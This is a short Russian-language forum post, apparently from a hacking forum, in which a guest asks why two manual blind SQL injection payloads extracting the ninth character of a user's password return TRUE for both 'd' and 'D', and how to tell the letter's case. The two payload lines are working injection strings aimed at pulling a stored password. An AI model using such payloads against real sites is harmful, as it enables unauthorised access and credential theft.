12.05.2015, 21:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
Почему при ручной эксплуатации blind sql, запросы:
Код:
Code:
or+substring((select+password+from+user+where+id=1+limit+0,1),9,1)=0x64+--+
or+substring((select+password+from+user+where+id=1+limit+0,1),9,1)=0x44+--+
Будут одинаково TRUE? PS 0x64='d' 0x44='D'
Как в таком случае определить в каком регистре буква в пароле? |
|
|
|